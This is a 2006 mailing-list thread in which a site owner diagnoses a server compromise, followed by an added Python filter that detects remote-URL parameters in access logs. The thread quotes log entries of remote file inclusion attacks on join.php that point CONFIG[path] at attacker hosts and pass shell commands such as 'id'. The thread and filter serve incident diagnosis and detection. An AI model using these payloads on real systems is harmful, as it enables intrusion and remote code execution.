On Tue, 23 May 2006 08:45:30 +0100 Paul Howarth paul@city-fan.org wrote:
On Mon, 2006-05-22 at 23:11 -0400, CodeHeads wrote:
On Tue, 23 May 2006 00:14:32 +0000 replies-lists-redhat@listmail.innovate.net wrote:
i haven't been following this topic in great detail, but i suspect that you have a form on your site that is being exploited for "form spam". if you're not familiar with this, search google for "form spam".
- Rick
Rick, Thank you, No, I have not heard of this.
I don't think that's what this is. Form spam takes advantage of poorly-coded mail/contact forms and uses them to send mail to recipients other than those intended by the form designer.
What's happening here is that the spammer is running their own code (downloaded into /tmp) to send the mail, a rather more serious situation.
Paul.
I might not know too much but I really think they are using my forms. I found quite a few log entries. Here are a few.

81.199.173.8 - - [22/May/2006:18:57:51 -0400] "POST /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://www.tiffefermaintfashion.com/gbook/tmp/xzblog.txt? HTTP/1.0" 200 5923

AOL:

172.179.33.217 - - [21/May/2006:07:58:01 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=id HTTP/1.1" 200 2374
172.179.33.217 - - [21/May/2006:07:58:20 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=w HTTP/1.1" 200 2412
172.179.33.217 - - [21/May/2006:07:58:34 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=cd%20/var/tmp HTTP/1.1" 200 2323
And the xpl.netmisphere2.com site has hacking information: http://xpl.netmisphere2.com/ I think this ought to be illegal!!
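
Added example, not part of the original thread: a small Python filter that flags access-log requests in which a query-string parameter is set to a remote URL, the pattern visible in the log entries quoted above. The sample log lines, client addresses, dates and the files.example.net host are constructed; only the join.php path and parameter names follow the thread.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache common/combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself an absolute remote URL.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def remote_url_params(line):
    """Return (ip, path, status, [(param, value), ...]) when the request's
    query string has a parameter set to a remote URL, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl percent-decodes names and values, so an encoded
    # "http%3A%2F%2F..." value is caught as well as a literal one.
    hits = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if REMOTE_RE.match(v.strip())]
    if not hits:
        return None
    return m.group("ip"), parts.path, int(m.group("status")), hits

def flag_lines(lines):
    """Keep only the log lines that carry a remote-URL parameter."""
    return [hit for hit in map(remote_url_params, lines) if hit]

# Constructed sample entries (documentation addresses and hosts).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /topsites/sources/join.php'
    '?FORM%5burl%5d=x&CONFIG%5bpath%5d=http://files.example.net/a.txt? HTTP/1.1" 200 2374',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "POST /topsites/sources/join.php'
    '?CONFIG%5bpath%5d=http%3A%2F%2Ffiles.example.net%2Fa.txt HTTP/1.0" 404 310',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] '
    '"GET /topsites/index.php?page=2&ref=about HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:01:09 +0000] '
    '"GET /search.php?q=http+proxy HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, path, status, hits in flag_lines(SAMPLE):
        print(ip, status, path, hits)
```

The status code is returned with each hit so that requests the server answered with 200 can be reviewed first.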